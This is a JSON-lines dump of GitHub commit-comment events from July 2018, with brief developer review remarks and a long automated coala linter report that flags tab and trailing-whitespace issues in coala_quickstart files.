{"id":"7909291730","type":"CommitCommentEvent","actor":{"login":"andrey-helldar"},"repo":{"name":"caouecs/Laravel-lang"},"payload":{"comment":{"id":29573034,"position":null,"line":null,"path":null,"commit_id":"91e31ed5fb45e998d662d983cea6a5fb48b199b7","created_at":"2018-07-02T22:39:47Z","updated_at":"2018-07-02T22:39:47Z","author_association":"CONTRIBUTOR","body":"Thanks, @adelf!\r\nI was wrong when wrote."}},"created_at":"2018-07-02T22:39:47Z"}
{"id":"7909294249","type":"CommitCommentEvent","actor":{"login":"mps4dev"},"repo":{"name":"Nebres/Kodilla-Course"},"payload":{"comment":{"id":29573038,"position":14,"line":11,"path":"kodilla-testing/src/test/java/com/kodilla/testing/library/BookDirectoryTestSuite.java","commit_id":"d5359c9db768f604358137c2b616f70b43e24772","created_at":"2018-07-02T22:40:39Z","updated_at":"2018-07-02T22:40:39Z","author_association":"COLLABORATOR","body":"to nie są pola statyczne :-) to ci w ogóle zadziałało?"}},"created_at":"2018-07-02T22:40:39Z"}
{"id":"7909295433","type":"CommitCommentEvent","actor":{"login":"SiamakEshghi"},"repo":{"name":"udacity/reactnd-UdaciFitness-complete"},"payload":{"comment":{"id":29573039,"position":null,"line":null,"path":null,"commit_id":"a3e78fe08ac785e6ce372ed37bfb5bcfa19851e3","created_at":"2018-07-02T22:41:05Z","updated_at":"2018-07-02T22:41:05Z","author_association":"NONE","body":"I think you need a little change in your mapStateToProps. It should be like this:\r\n\r\nfunction mapStateToProps (state) {\r\n    const key = timeToString()\r\n   if (typeof state !== 'undefined') {\r\n    return {\r\n        alreadyLogged: state[key] && typeof state[key].today === 'undefined'\r\n      }\r\n   }\r\n    return {}\r\n  }\r\n\r\nbecause when you run the app for the first-time, the state is undefined and an error occurs."}},"created_at":"2018-07-02T22:41:05Z"}
{"id":"7909296713","type":"CommitCommentEvent","actor":{"login":"MattFerraro"},"repo":{"name":"anotherjesse/viewpoints"},"payload":{"comment":{"id":29573042,"position":null,"line":null,"path":null,"commit_id":"f4794bd508edce7ddf782bacb53de88cdefd2ccb","created_at":"2018-07-02T22:41:30Z","updated_at":"2018-07-02T22:41:30Z","author_association":"NONE","body":"Whoa, nice!"}},"created_at":"2018-07-02T22:41:30Z"}
{"id":"7909297838","type":"CommitCommentEvent","actor":{"login":"MattFerraro"},"repo":{"name":"anotherjesse/viewpoints"},"payload":{"comment":{"id":29573044,"position":101,"line":278,"path":"src/components/app.js","commit_id":"f4794bd508edce7ddf782bacb53de88cdefd2ccb","created_at":"2018-07-02T22:41:53Z","updated_at":"2018-07-02T22:41:53Z","author_association":"NONE","body":"hmm, can it accept both?"}},"created_at":"2018-07-02T22:41:53Z"}
{"id":"7909299323","type":"CommitCommentEvent","actor":{"login":"jabranham"},"repo":{"name":"jabranham/ESS"},"payload":{"comment":{"id":29573046,"position":5,"line":950,"path":"lisp/ess-mode.el","commit_id":"43501f19167d94dbe8ef5a604bcafe53183ec8e3","created_at":"2018-07-02T22:42:24Z","updated_at":"2018-07-02T22:42:24Z","author_association":"OWNER","body":"If we pass the path as name, though, then Emacs will try to create `C:/Program files ...` as a function. "}},"created_at":"2018-07-02T22:42:24Z"}
{"id":"7909302290","type":"CommitCommentEvent","actor":{"login":"gitmate-bot"},"repo":{"name":"coala/coala-quickstart"},"payload":{"comment":{"id":29573053,"position":null,"line":null,"path":null,"commit_id":"6c6ddc794c49f62aa4394fed5422ae447362e4fd","created_at":"2018-07-02T22:43:22Z","updated_at":"2018-07-02T22:43:22Z","author_association":"NONE","body":"Comment on 6c6ddc794c49f62aa4394fed5422ae447362e4fd.\n\nThere are 247 results for the section all.python. They have been shortened and will not be shown inline because they are more than 10.\n\n| Message | File | Line |\n|---|---|---|\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 5 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 6 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 7 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 8 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 9 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 10 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 11 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 14 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 15 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 16 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 17 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 18 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 19 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 20 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 21 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 22 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 23 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 24 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 25 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 26 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 27 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 28 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 29 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 30 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 31 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 32 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 33 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 34 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 35 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 36 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 37 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 38 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 39 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 40 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 41 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 42 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 43 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 44 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/filename_operations.py | 45 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/QuickstartBear.py | 7 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/QuickstartBear.py | 8 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/QuickstartBear.py | 9 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/QuickstartBear.py | 10 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/QuickstartBear.py | 11 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/QuickstartBear.py | 12 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/QuickstartBear.py | 13 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/QuickstartBear.py | 15 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/QuickstartBear.py | 16 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/QuickstartBear.py | 17 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/QuickstartBear.py | 18 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/QuickstartBear.py | 19 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/QuickstartBear.py | 20 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/QuickstartBear.py | 21 |\n| This file contains unused source code. | coala_quickstart/green_mode/green_mode.py | 113 |\n| This file contains unused source code. | coala_quickstart/green_mode/green_mode.py | 155 |\n| This file contains unused source code. | coala_quickstart/green_mode/green_mode.py | 193 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 16 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 17 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 18 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 19 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 20 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 24 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 25 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 26 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 27 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 28 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 32 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 33 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 37 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 38 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 39 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 40 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 41 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 43 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 44 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 45 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 46 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 47 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 48 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 49 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 50 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 51 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 52 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 53 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 54 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 55 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 56 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 60 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 61 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 62 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 63 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 64 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 65 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 66 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 67 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 71 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 72 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 73 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 74 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 75 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 76 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 77 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 78 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 79 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 80 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 81 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 82 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 83 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 84 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 88 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 89 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 90 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 91 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 92 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 93 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 94 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 95 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 96 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 97 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 98 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 99 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 100 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 104 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 105 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 106 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 107 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 108 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 109 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 110 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 111 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 112 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 113 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 114 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 115 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 116 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 117 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 119 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 120 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 121 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 122 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 124 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 125 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 127 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 130 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 131 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 132 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 133 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 134 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 135 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 136 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 137 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 138 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 139 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 140 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 141 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 145 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 146 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 147 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 148 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 149 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 150 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 151 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 152 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 153 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 154 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 155 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 156 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 157 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 158 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 159 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 160 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 161 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 162 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 163 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 164 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 165 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 166 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 167 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 168 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 169 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 170 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 171 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 172 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 173 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 174 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 175 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 176 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 177 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 178 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 179 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 180 |\n| Line contains following spacing inconsistencies: - Trailing whitespaces. | coala_quickstart/green_mode/green_mode.py | 181 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 182 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 183 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 184 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 185 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 186 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 187 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 188 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 189 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 190 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 191 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 192 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 193 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 194 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 195 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 196 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 197 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 198 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 199 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 200 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 201 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 202 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 203 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 204 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 205 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 206 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 209 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 211 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 212 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 213 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 218 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 219 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 220 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 221 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 222 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 223 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 224 |\n| Line contains following spacing inconsistencies: - Trailing whitespaces. | coala_quickstart/green_mode/green_mode.py | 225 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 226 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 227 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 228 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 229 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 230 